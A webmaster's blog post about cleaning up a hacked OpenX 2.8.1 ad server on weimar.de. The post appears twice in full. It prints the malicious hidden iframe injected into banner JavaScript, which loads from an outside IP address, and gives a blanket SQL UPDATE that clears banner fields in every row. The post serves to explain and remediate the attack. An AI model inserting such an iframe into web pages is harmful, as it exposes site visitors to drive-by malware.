OpenX – security problem with malware hack

I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.

The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

Checking all php-files (no, actually most important these three:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

)

I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).

So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:

  • prepend
  • append
  • html_cache
  • html_template

empty!

I rigourously cleared out all the sh*t by doing this simple statement:

UPDATE `my_db`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;

Good luck!I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.

The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

Checking all php-files (no, actually most important these three:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

)

I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).

So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:

  • prepend
  • append
  • html_cache
  • html_template

empty!

I rigourously cleared out all the sh*t by doing this simple statement:

UPDATE `web2_db5`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;

Good luck!


Weitere...

Sozi-Spezi Bitte merken Sie sich eines. Wenn jemand Sie mit "Du Armer Irrer!" anspricht, dann heißt das, politisch korrekt: "Du sozial schwacher Irrer!". Danke.
Deine Wirtschaft ist alles, Du bist nichts. Ein Auszug aus meinem Essay über den Weg von zynischen christlichen Werten zur anhaltenden Entfremdung in der Moderne. Was hat der Kapitalismus nun...
Wie war das nochmal mit den Kindern? Es geht immer weiter abwärts mit der jeweils jungen Generation. Wir wissen ja, daß früher alles besser... und so weiter, aber was eigentlich besser wa...

Dieser Post ist auch verfügbar auf: Englisch

Kommentar verfassen